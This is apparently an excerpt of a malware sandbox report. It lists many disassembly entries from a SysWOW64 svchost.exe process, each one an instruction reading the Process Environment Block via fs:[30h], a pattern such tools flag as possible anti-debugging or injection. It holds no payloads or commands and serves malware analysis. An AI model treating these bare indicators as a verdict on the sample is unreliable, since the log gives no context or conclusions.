Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039347FB mov eax, dword ptr fs:[00000030h]	5_2_039347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039527ED mov eax, dword ptr fs:[00000030h]	5_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039527ED mov eax, dword ptr fs:[00000030h]	5_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039527ED mov eax, dword ptr fs:[00000030h]	5_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039BE7E1 mov eax, dword ptr fs:[00000030h]	5_2_039BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03930710 mov eax, dword ptr fs:[00000030h]	5_2_03930710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03960710 mov eax, dword ptr fs:[00000030h]	5_2_03960710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396C700 mov eax, dword ptr fs:[00000030h]	5_2_0396C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396273C mov eax, dword ptr fs:[00000030h]	5_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396273C mov ecx, dword ptr fs:[00000030h]	5_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396273C mov eax, dword ptr fs:[00000030h]	5_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AC730 mov eax, dword ptr fs:[00000030h]	5_2_039AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396C720 mov eax, dword ptr fs:[00000030h]	5_2_0396C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396C720 mov eax, dword ptr fs:[00000030h]	5_2_0396C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03930750 mov eax, dword ptr fs:[00000030h]	5_2_03930750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039BE75D mov eax, dword ptr fs:[00000030h]	5_2_039BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972750 mov eax, dword ptr fs:[00000030h]	5_2_03972750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972750 mov eax, dword ptr fs:[00000030h]	5_2_03972750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B4755 mov eax, dword ptr fs:[00000030h]	5_2_039B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396674D mov esi, dword ptr fs:[00000030h]	5_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396674D mov eax, dword ptr fs:[00000030h]	5_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396674D mov eax, dword ptr fs:[00000030h]	5_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03938770 mov eax, dword ptr fs:[00000030h]	5_2_03938770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940770 mov eax, dword ptr fs:[00000030h]	5_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940770 mov eax, dword ptr fs:[00000030h]	5_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940770 mov eax, dword ptr fs:[00000030h]	5_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940770 mov eax, dword ptr fs:[00000030h]	5_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940770 mov eax, dword ptr fs:[00000030h]	5_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940770 mov eax, dword ptr fs:[00000030h]	5_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940770 mov eax, dword ptr fs:[00000030h]	5_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940770 mov eax, dword ptr fs:[00000030h]	5_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940770 mov eax, dword ptr fs:[00000030h]	5_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940770 mov eax, dword ptr fs:[00000030h]	5_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940770 mov eax, dword ptr fs:[00000030h]	5_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940770 mov eax, dword ptr fs:[00000030h]	5_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03934690 mov eax, dword ptr fs:[00000030h]	5_2_03934690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03934690 mov eax, dword ptr fs:[00000030h]	5_2_03934690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039666B0 mov eax, dword ptr fs:[00000030h]	5_2_039666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396C6A6 mov eax, dword ptr fs:[00000030h]	5_2_0396C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]	5_2_0396A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396A6C7 mov eax, dword ptr fs:[00000030h]	5_2_0396A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	5_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	5_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	5_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	5_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B06F1 mov eax, dword ptr fs:[00000030h]	5_2_039B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B06F1 mov eax, dword ptr fs:[00000030h]	5_2_039B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03972619 mov eax, dword ptr fs:[00000030h]	5_2_03972619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AE609 mov eax, dword ptr fs:[00000030h]	5_2_039AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394260B mov eax, dword ptr fs:[00000030h]	5_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394260B mov eax, dword ptr fs:[00000030h]	5_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394260B mov eax, dword ptr fs:[00000030h]	5_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394260B mov eax, dword ptr fs:[00000030h]	5_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394260B mov eax, dword ptr fs:[00000030h]	5_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394260B mov eax, dword ptr fs:[00000030h]	5_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394260B mov eax, dword ptr fs:[00000030h]	5_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394E627 mov eax, dword ptr fs:[00000030h]	5_2_0394E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03966620 mov eax, dword ptr fs:[00000030h]	5_2_03966620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03968620 mov eax, dword ptr fs:[00000030h]	5_2_03968620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393262C mov eax, dword ptr fs:[00000030h]	5_2_0393262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394C640 mov eax, dword ptr fs:[00000030h]	5_2_0394C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03962674 mov eax, dword ptr fs:[00000030h]	5_2_03962674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F866E mov eax, dword ptr fs:[00000030h]	5_2_039F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F866E mov eax, dword ptr fs:[00000030h]	5_2_039F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396A660 mov eax, dword ptr fs:[00000030h]	5_2_0396A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396A660 mov eax, dword ptr fs:[00000030h]	5_2_0396A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396E59C mov eax, dword ptr fs:[00000030h]	5_2_0396E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03932582 mov eax, dword ptr fs:[00000030h]	5_2_03932582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03932582 mov ecx, dword ptr fs:[00000030h]	5_2_03932582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03964588 mov eax, dword ptr fs:[00000030h]	5_2_03964588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039545B1 mov eax, dword ptr fs:[00000030h]	5_2_039545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039545B1 mov eax, dword ptr fs:[00000030h]	5_2_039545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B05A7 mov eax, dword ptr fs:[00000030h]	5_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B05A7 mov eax, dword ptr fs:[00000030h]	5_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B05A7 mov eax, dword ptr fs:[00000030h]	5_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039365D0 mov eax, dword ptr fs:[00000030h]	5_2_039365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396A5D0 mov eax, dword ptr fs:[00000030h]	5_2_0396A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396A5D0 mov eax, dword ptr fs:[00000030h]	5_2_0396A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396E5CF mov eax, dword ptr fs:[00000030h]	5_2_0396E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396E5CF mov eax, dword ptr fs:[00000030h]	5_2_0396E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039325E0 mov eax, dword ptr fs:[00000030h]	5_2_039325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396C5ED mov eax, dword ptr fs:[00000030h]	5_2_0396C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396C5ED mov eax, dword ptr fs:[00000030h]	5_2_0396C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C6500 mov eax, dword ptr fs:[00000030h]	5_2_039C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A04500 mov eax, dword ptr fs:[00000030h]	5_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A04500 mov eax, dword ptr fs:[00000030h]	5_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A04500 mov eax, dword ptr fs:[00000030h]	5_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A04500 mov eax, dword ptr fs:[00000030h]	5_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A04500 mov eax, dword ptr fs:[00000030h]	5_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A04500 mov eax, dword ptr fs:[00000030h]	5_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A04500 mov eax, dword ptr fs:[00000030h]	5_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940535 mov eax, dword ptr fs:[00000030h]	5_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940535 mov eax, dword ptr fs:[00000030h]	5_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940535 mov eax, dword ptr fs:[00000030h]	5_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940535 mov eax, dword ptr fs:[00000030h]	5_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940535 mov eax, dword ptr fs:[00000030h]	5_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940535 mov eax, dword ptr fs:[00000030h]	5_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395E53E mov eax, dword ptr fs:[00000030h]	5_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395E53E mov eax, dword ptr fs:[00000030h]	5_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395E53E mov eax, dword ptr fs:[00000030h]	5_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395E53E mov eax, dword ptr fs:[00000030h]	5_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395E53E mov eax, dword ptr fs:[00000030h]	5_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03938550 mov eax, dword ptr fs:[00000030h]	5_2_03938550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03938550 mov eax, dword ptr fs:[00000030h]	5_2_03938550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396656A mov eax, dword ptr fs:[00000030h]	5_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396656A mov eax, dword ptr fs:[00000030h]	5_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396656A mov eax, dword ptr fs:[00000030h]	5_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039EA49A mov eax, dword ptr fs:[00000030h]	5_2_039EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039644B0 mov ecx, dword ptr fs:[00000030h]	5_2_039644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039BA4B0 mov eax, dword ptr fs:[00000030h]	5_2_039BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039364AB mov eax, dword ptr fs:[00000030h]	5_2_039364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039304E5 mov ecx, dword ptr fs:[00000030h]	5_2_039304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03968402 mov eax, dword ptr fs:[00000030h]	5_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03968402 mov eax, dword ptr fs:[00000030h]	5_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03968402 mov eax, dword ptr fs:[00000030h]	5_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396A430 mov eax, dword ptr fs:[00000030h]	5_2_0396A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392E420 mov eax, dword ptr fs:[00000030h]	5_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392E420 mov eax, dword ptr fs:[00000030h]	5_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392E420 mov eax, dword ptr fs:[00000030h]	5_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392C427 mov eax, dword ptr fs:[00000030h]	5_2_0392C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B6420 mov eax, dword ptr fs:[00000030h]	5_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B6420 mov eax, dword ptr fs:[00000030h]	5_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B6420 mov eax, dword ptr fs:[00000030h]	5_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B6420 mov eax, dword ptr fs:[00000030h]	5_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B6420 mov eax, dword ptr fs:[00000030h]	5_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B6420 mov eax, dword ptr fs:[00000030h]	5_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B6420 mov eax, dword ptr fs:[00000030h]	5_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039EA456 mov eax, dword ptr fs:[00000030h]	5_2_039EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392645D mov eax, dword ptr fs:[00000030h]	5_2_0392645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395245A mov eax, dword ptr fs:[00000030h]	5_2_0395245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396E443 mov eax, dword ptr fs:[00000030h]	5_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396E443 mov eax, dword ptr fs:[00000030h]	5_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396E443 mov eax, dword ptr fs:[00000030h]	5_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396E443 mov eax, dword ptr fs:[00000030h]	5_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396E443 mov eax, dword ptr fs:[00000030h]	5_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396E443 mov eax, dword ptr fs:[00000030h]	5_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396E443 mov eax, dword ptr fs:[00000030h]	5_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396E443 mov eax, dword ptr fs:[00000030h]	5_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395A470 mov eax, dword ptr fs:[00000030h]	5_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395A470 mov eax, dword ptr fs:[00000030h]	5_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395A470 mov eax, dword ptr fs:[00000030h]	5_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039BC460 mov ecx, dword ptr fs:[00000030h]	5_2_039BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940BBE mov eax, dword ptr fs:[00000030h]	5_2_03940BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940BBE mov eax, dword ptr fs:[00000030h]	5_2_03940BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E4BB0 mov eax, dword ptr fs:[00000030h]	5_2_039E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E4BB0 mov eax, dword ptr fs:[00000030h]	5_2_039E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DEBD0 mov eax, dword ptr fs:[00000030h]	5_2_039DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03950BCB mov eax, dword ptr fs:[00000030h]	5_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03950BCB mov eax, dword ptr fs:[00000030h]	5_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03950BCB mov eax, dword ptr fs:[00000030h]	5_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03930BCD mov eax, dword ptr fs:[00000030h]	5_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03930BCD mov eax, dword ptr fs:[00000030h]	5_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03930BCD mov eax, dword ptr fs:[00000030h]	5_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03938BF0 mov eax, dword ptr fs:[00000030h]	5_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03938BF0 mov eax, dword ptr fs:[00000030h]	5_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03938BF0 mov eax, dword ptr fs:[00000030h]	5_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395EBFC mov eax, dword ptr fs:[00000030h]	5_2_0395EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039BCBF0 mov eax, dword ptr fs:[00000030h]	5_2_039BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AEB1D mov eax, dword ptr fs:[00000030h]	5_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AEB1D mov eax, dword ptr fs:[00000030h]	5_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AEB1D mov eax, dword ptr fs:[00000030h]	5_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AEB1D mov eax, dword ptr fs:[00000030h]	5_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AEB1D mov eax, dword ptr fs:[00000030h]	5_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AEB1D mov eax, dword ptr fs:[00000030h]	5_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AEB1D mov eax, dword ptr fs:[00000030h]	5_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AEB1D mov eax, dword ptr fs:[00000030h]	5_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AEB1D mov eax, dword ptr fs:[00000030h]	5_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A04B00 mov eax, dword ptr fs:[00000030h]	5_2_03A04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395EB20 mov eax, dword ptr fs:[00000030h]	5_2_0395EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395EB20 mov eax, dword ptr fs:[00000030h]	5_2_0395EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F8B28 mov eax, dword ptr fs:[00000030h]	5_2_039F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F8B28 mov eax, dword ptr fs:[00000030h]	5_2_039F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03928B50 mov eax, dword ptr fs:[00000030h]	5_2_03928B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DEB50 mov eax, dword ptr fs:[00000030h]	5_2_039DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E4B4B mov eax, dword ptr fs:[00000030h]	5_2_039E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E4B4B mov eax, dword ptr fs:[00000030h]	5_2_039E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C6B40 mov eax, dword ptr fs:[00000030h]	5_2_039C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C6B40 mov eax, dword ptr fs:[00000030h]	5_2_039C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FAB40 mov eax, dword ptr fs:[00000030h]	5_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D8B42 mov eax, dword ptr fs:[00000030h]	5_2_039D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392CB7E mov eax, dword ptr fs:[00000030h]	5_2_0392CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A02B57 mov eax, dword ptr fs:[00000030h]	5_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A02B57 mov eax, dword ptr fs:[00000030h]	5_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A02B57 mov eax, dword ptr fs:[00000030h]	5_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A02B57 mov eax, dword ptr fs:[00000030h]	5_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03968A90 mov edx, dword ptr fs:[00000030h]	5_2_03968A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393EA80 mov eax, dword ptr fs:[00000030h]	5_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393EA80 mov eax, dword ptr fs:[00000030h]	5_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393EA80 mov eax, dword ptr fs:[00000030h]	5_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393EA80 mov eax, dword ptr fs:[00000030h]	5_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393EA80 mov eax, dword ptr fs:[00000030h]	5_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393EA80 mov eax, dword ptr fs:[00000030h]	5_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393EA80 mov eax, dword ptr fs:[00000030h]	5_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393EA80 mov eax, dword ptr fs:[00000030h]	5_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393EA80 mov eax, dword ptr fs:[00000030h]	5_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A04A80 mov eax, dword ptr fs:[00000030h]	5_2_03A04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03938AA0 mov eax, dword ptr fs:[00000030h]	5_2_03938AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03938AA0 mov eax, dword ptr fs:[00000030h]	5_2_03938AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03986AA4 mov eax, dword ptr fs:[00000030h]	5_2_03986AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03930AD0 mov eax, dword ptr fs:[00000030h]	5_2_03930AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03964AD0 mov eax, dword ptr fs:[00000030h]	5_2_03964AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03964AD0 mov eax, dword ptr fs:[00000030h]	5_2_03964AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03986ACC mov eax, dword ptr fs:[00000030h]	5_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03986ACC mov eax, dword ptr fs:[00000030h]	5_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03986ACC mov eax, dword ptr fs:[00000030h]	5_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396AAEE mov eax, dword ptr fs:[00000030h]	5_2_0396AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396AAEE mov eax, dword ptr fs:[00000030h]	5_2_0396AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039BCA11 mov eax, dword ptr fs:[00000030h]	5_2_039BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03954A35 mov eax, dword ptr fs:[00000030h]	5_2_03954A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03954A35 mov eax, dword ptr fs:[00000030h]	5_2_03954A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396CA38 mov eax, dword ptr fs:[00000030h]	5_2_0396CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396CA24 mov eax, dword ptr fs:[00000030h]	5_2_0396CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395EA2E mov eax, dword ptr fs:[00000030h]	5_2_0395EA2E
